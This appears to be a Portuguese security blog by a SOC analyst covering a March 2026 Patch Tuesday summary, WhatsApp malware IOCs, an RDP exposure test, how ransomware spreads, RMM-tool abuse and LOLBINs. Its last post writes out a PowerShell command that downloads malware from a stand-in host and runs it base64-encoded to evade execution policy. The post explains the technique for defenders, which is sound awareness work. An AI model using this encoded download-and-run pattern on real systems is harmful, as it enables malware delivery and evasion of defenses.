Autor: Pedro Brandt Zanqueta

Formado em Análise e Desenvolvimento de Sistemas na Fatec Rio Preto, comecei minha carreira com gerenciamento de infraestrutura terceirizada focado no Mercado Microsoft. Windows Server, Microsoft 365 e outros produtos da família foram o meu dia a dia por muitos anos. Como sempre focamos em manter os sistemas com os melhores processos de segurança, iniciamos os estudos para Cybersegurança. Pentest Profissional - Desec, Cursos do Cert.BR e certificações Palo Alto foram partes desse caminho, atualmente ao lado do time de SOC na CYLO temos o objetivo principal "Prevenir perdas"!

Atualizações ambiente Microsoft Windows 11 / Server

As atualizações mensais da Microsoft, conhecidas como Patch Tuesday, tem uma importante função, corrigir vulnerabilidades que podem ser exploradas por atacantes para comprometer ativos de ambientes corporativos ou pessoais. A última atualização, março de 2026 é um exemplo claro dos riscos de se manter sistemas desatualizados.

Conforme o release note da atualização, corrige 79 vulnerabilidades de segurança, incluindo duas falhas zero-day divulgadas publicamente, além de vulnerabilidades críticas no Windows 11, Windows Server, Microsoft Office, SQL Server e .NET.

Em detalhe temos:

  • 46 vulnerabilidades de Elevação de Privilégio (EoP)
  • 18 vulnerabilidades de Execução Remota de Código (RCE)
  • 10 vulnerabilidades de Divulgação de Informação
  • 4 vulnerabilidades de Negação de Serviço (DoS)
  • 4 vulnerabilidades de Spoofing
  • 2 vulnerabilidades de Bypass de Recursos de Segurança

Pontos de atenção

Vulnerabilidades Zero-Day
Duas vulnerabilidades zero-day divulgadas publicamente, ou seja, falhas cujo funcionamento já era conhecido antes da liberação do patch.

    CVE-2026-21262 – SQL Server (Elevação de Privilégio)
    Permite que um usuário autenticado eleve seus privilégios para SQL Admin (sysadmin) remotamente. Essa falha pode resultar em controle total de bases de dados críticas, comprometendo confidencialidade e integridade das informações.

    CVE-2026-26127 – .NET (Negação de Serviço)
    Falha causada por leitura fora dos limites de memória, permitindo que um atacante cause indisponibilidade de serviços que dependem de aplicações .NET.

    Vulnerabilidades Críticas no Microsoft Office

      CVE-2026-26110 e CVE-2026-26113 – Microsoft Office (RCE)
      Essas vulnerabilidades podem ser exploradas apenas com a visualização do arquivo no Painel de Visualização, sem que o usuário precise abrir o documento. Isso representa um risco elevado de ataques por phishing e e-mails maliciosos.

      CVE-2026-26144 – Microsoft Excel (Information disclosure)
      Permite vazar dados sensíveis e chamou atenção por possível exploração via Microsoft Copilot.

      Elevação de Privilégio no Windows e Windows Server
      A maioria das vulnerabilidades corrigidas está relacionada à elevação de privilégio, afetando componentes centrais do Windows, como:

        Windows Kernel, Windows SMB Server, Winlogon e Windows DWM Core Library.

        Ataques destinados ao Brasil via Whatsapp

        Estamos lidando massivamente com a resposta a incidente que vem ocorrendo nessa semana. O ataque inicia via Whatsapp, aplicativo muito utilizado no nosso país.

        O objetivo é notificar a todos desse ataque, onde se inicia a partir de arquivo ZIP compartilhado pelo mensageiro, sugerindo o usuário baixar em sua estação e descompactar para execução dos arquivos relacionados e posteriormente iniciar sua exploração.

        Sempre desconfie e análise com cautela das informações ao qual recebe e envia, duvide de arquivos, mensagens, promoções e qualquer outra categoria de mensagem.

        Recomendações:

        • Controlar aplicações não corporativas no ambiente;
        • Implantar XDR no ambiente para análise comportamental;
        • Integração de feeds de inteligência;
        • Treinamentos no ambiente corporativo;
        • Divulgação de comunicados internos;

        IOCs

        sorvetenopote[.]com
        expansiveuser[.]com
        zapgrande[.]com
        imobiliariaricardoparanhos[.]com
        886136adfac9287ecb53f45d8b5ab42e98d2c8c058288e81795caa13dbf5faa8
        94411cd5eb27b28b0b039ac07eef2ec0f4e0e0ebd83884bfcaf79665d73d0b6a
        109[.]176[.]30[.]141
        23[.]227[.]203[.]148

        Exemplo da mensagem que o pessoal recebe:

        Impacto das conexões externas

        Durante um estudo para um projeto interno, onde criamos ambientes propositalmente vulneráveis, obtivemos resultados interessantes ao analisar fatores relacionados a conexões externas.

        Por mais de um mês, mantivemos a porta de RDP (3389) aberta exclusivamente para conexões originadas do Brasil. Mesmo com essa restrição geográfica, registramos diversas tentativas de exploração, força bruta de senhas e uso de ferramentas de escaneamento. No entanto, nenhum sistema foi comprometido.

        Decidimos então testar o extremo: liberamos o acesso RDP 3389 para o mundo inteiro. O resultado? Em menos de 24 horas, tivemos um sistema comprometido.

        Isso levanta uma questão: o Brasil sofre menos ataques? A resposta é não. Segundo o relatório da IBM, as empresas brasileiras estão entre as cinco mais atacadas do mundo.

        O que temos observado é que muitas empresas mantêm sistemas expostos à internet sem as devidas proteções. Sites como o Shodan.io realizam varreduras globais em busca de serviços abertos, revelando a fragilidade de muitas infraestruturas.

        Times de infraestrutura e segurança precisam implementar camadas de proteção: firewalls, IPS, regras de controle e restrições geográficas são medidas que podem salvar empresas em risco.

        Por fim, deixo uma reflexão: você, que atua em infraestrutura, segurança ou áreas correlatas, já validou se suas aplicações expostas externamente possuem restrições de origem bem definidas? Se não, qual é a desculpa?

        Como o Ransomware se Espalha Dentro da Sua Rede

        Ajudando em uma resposta a incidente, recentemente tivemos que lidar com um determinado grupo de ransomware que atrapalhou uma empresa por um período. Com isso decidi detalhar como geralmente um ataque ocorre.

        Ponto de partida

        Imagine uma manhã comum na sua empresa. Os colaboradores chegam e iniciam suas atividades. Tudo parece normal até que, um e-mail aparentemente inofensivo chega à caixa de entrada de um colaborador do setor financeiro. O assunto é: “Nota Fiscal em Atraso – URGENTE”. Sem nem desconfiar, o funcionário clica no anexo.

        O anexo executa um script em PowerShell, que baixa e executa um payload malicioso. Em segundos, o atacante já acesso à rede. Mas o objetivo não é apenas comprometer uma máquina é paralisar a empresa inteira. E para isso, o ransomware precisa se espalhar.

        Descoberta do ambiente

        Antes de se mover, o atacante precisa entender o ambiente. Ele começa com técnicas de reconhecimento interno. Utiliza comandos para descobrir sistemas remotos, identificar conexões de rede, e localizar compartilhamentos acessíveis.

        Com essas informações em mãos, o atacante sabe exatamente onde estão os servidores de arquivos, os controladores de domínio e as estações mais críticas.

        Movimentação lateral

        Para se mover lateralmente, o atacante precisa de credenciais. Com Mimikatz usa para extrair senhas da memória do processo LSASS. Se tiver sorte, encontra credenciais de administradores de domínio. Caso contrário, ele pode recorrer a ataques de força bruta ou password spray para comprometer outras contas.

        Usando ferramentas como PsExec ou WMI, o ransomware começa a se espalhar. Ele cópia seus arquivos para máquinas remotas usando compartilhamentos administrativos e executa o payload silenciosamente.

        Se encontrar vulnerabilidades conhecidas, como EternalBlue, ele pode explorá-las diretamente, sem depender de credenciais.

        Garantindo a Persistência

        Para garantir que o ransomware continue ativo mesmo após reinicializações, o atacante cria tarefas agendadas ou serviços maliciosos.

        Processo Final

        Quando o atacante sente que já comprometeu o suficiente, ele inicia a fase final: a criptografia. Utilizando algoritmos robustos, o ransomware bloqueia arquivos em servidores, estações de trabalho e até backups conectados.

        Em minutos, a empresa inteira está paralisada. Um aviso aparece nas telas: “Seus arquivos foram criptografados. Pague em Bitcoin para recuperá-los.”

        Melhorias no ambiente

        • Segmentação de rede: impede que o atacante se mova livremente.
        • Monitoramento de credenciais: detecta uso anômalo de contas.
        • Atualizações regulares: fecham portas exploradas por vulnerabilidades.
        • Treinamento de usuários: reduz o risco de phishing.
        • Soluções de segurança avançadas: como EDRs e SIEMs, ajudam a detectar e responder rapidamente.

        Conclusão

        O ransomware não é apenas um vírus que aparece do nada. Ele é o resultado de uma cadeia de ações cuidadosamente planejadas.

        A pergunta não é se sua empresa será alvo, mas quando. E quando isso acontecer, o quão preparado você estará?

        Utilização de ferramentas de acesso remoto (RMM)

        Ataques de phishing é uma das formas mais simples de conseguir um meio de transporte para dentro de um ambiente corporativo. O ataque utiliza de técnicas comportamentais e até sentimentais dos colaboradores, justificando um clique que pode dar uma boa dor de cabeça para a empresa.

        Esse tipo de tática executado com sucesso, é seguido por uma técnica de persistência e temos observado que agentes maliciosos estão utilizando ferramentas conhecidas para acesso remoto ao ambiente, dentre elas, Anydesk, TeamViewer, Atera e outros.

        Com isso, é possível passar por diversas camadas de segurança, visto que comumente são ferramentas utilizadas pelo próprio time de infraestrutura interno.

        Dicas para se proteger desse tipo de tática.

        1 – Utilizar software pago com customizações pelo time de infraestrutura, assim você consegue limitar somente de determinados lugares suas estações deverão aceitar conexões;

        2 – Bloquear conexões de qualquer outra ferramenta de acesso remoto no firewall, permitindo apenas a que utiliza, isso se ainda for necessário liberar acesso externo;

        3 – Seguindo nessa linha, caso sua plataforma permita um servidor interno ou um gateway interno dessa conexão, você limita as conexões apenas internas na rede;

        4 – Utilize seu MDM (Mobile Device Management) para permitir apenas execuções dos softwares permitidos;

        5 – Configure seu XDR para bloquear executáveis conhecidos diferente do utilizado internamente;

        6 – Treinamentos com os colaboradores, essa etapa para mim é essencial a que mais protege o ambiente corporativo.

        Referências:

        https://www.csoonline.com/article/3487743/attackers-increasingly-using-legitimate-remote-management-tools-to-hack-enterprises.html

        https://www.solissecurity.com/en-gb/insights/the-growing-threat-from-remote-access-tools-used-in-ransomware-attacks/

        https://attack.mitre.org/techniques/T1219/

        LOLBIN Windows

        Nos últimos dias trabalhamos em cima de um incidente relacionado a um executável assinado dentro do sistema operacional Microsoft Windows interagindo com agentes maliciosos, sim é isso mesmo que leu, um aplicativo oficial da Microsoft sendo utilizado como parte de um ataque, essa é a teoria dos LOLBIN (Living Off the Land Binaries).

        O ataque trabalhado utilizava do LOLBIN PowerShell.exe para transferir os arquivos e persistência no host. Já passou em nossas mãos por exemplo o serviço BITS (Background Intelligent Transfer Service) ao qual é responsável por gerenciar os pacotes de rede que são solicitados pelo sistema operacional, nesse serviço também é passível de ocorrer a mesma situação.

        Fica uma recomendação, acompanhem esse projeto mantido pela comunidade chamado LOLBAS Project. Estão focados em manter uma lista de aplicativos dentro do Microsoft Windows que é comum ser utilizados em ataques, com detalhes sabemos comandos e parâmetros que utilizam para passar por times de segurança e ferramentas despreparadas.

        Referências:

        https://lolbas-project.github.io

        Ataques obfuscados via PowerShell

        Lidamos recentemente com um incidente onde uma estação realizava semanalmente a execução de um script PowerShell via tarefa agendada. Isso levantou uma dúvida interessante, porque as políticas do próprio PowerShell não bloquearia, a Microsoft desenvolveu a política de execução do PowerShell, recurso de segurança ao qual controla as condições sob as quais o PowerShell carrega arquivos de configuração e executa scripts.

        Analisando a cadeia de execuções, identificamos que o comando está em base64, ao que nativamente o PowerShell realiza, com isso consegue dar um bypass nessa etapa de segurança a nível de sistema operacional.

        Segue abaixo um exemplo da técnica informada:

        $command = “Invoke-WebRequest http[:]//malicious[.]com -OutFile malware[.]exe”

        $encodedCommand = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($command))

        powershell -EncodedCommand $encodedCommand

        Essa é uma técnica entre muitas que atacantes utilizam, a pergunta que devemos fazer é, suas ferramentas e seu time estão preparados para lidar com ela?

        Referências:

        https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.5